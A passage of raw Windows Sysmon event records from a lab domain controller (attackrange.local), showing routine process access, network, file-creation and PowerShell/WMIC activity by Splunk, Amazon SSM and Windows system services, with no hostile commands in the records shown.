Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.407{266CAFBE-6480-6064-5400-00000000AE01}2332C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 11241100x80000000000000002429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.330{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_tjjeaadm.5ar.ps12021-03-31 12:01:04.330 10341000x80000000000000002428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.301{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.405{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49686-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000002426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.405{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49686-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000002425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.811{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54221- 354300x80000000000000002424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.485{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65022- 354300x80000000000000002423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.484{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65022-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domain 10341000x80000000000000002422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.221{266CAFBE-647F-6064-5300-00000000AE01}37763780C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.049{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.049{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:05.971{266CAFBE-6481-6064-6100-00000000AE01}3848\PSHost.132616656659114611.3848.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.971{266CAFBE-6481-6064-6100-00000000AE01}3848NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_md3fywrk.z33.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.971{266CAFBE-6481-6064-6100-00000000AE01}3848NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_vydednzy.bax.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.955{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_vydednzy.bax.ps12021-03-31 12:01:05.955 10341000x80000000000000002655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.945{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.914{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.913{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.912{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.911{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.911{266CAFBE-647E-6064-4300-00000000AE01}39243892C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6481-6064-5C00-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.911{266CAFBE-6481-6064-6100-00000000AE01}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Amazon\PVDriver'" "| Select-Object" "Name, Version" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.871{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.871{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.870{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000002638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.055{266CAFBE-647D-6064-3100-00000000AE01}2672WIN-DC-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000002637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 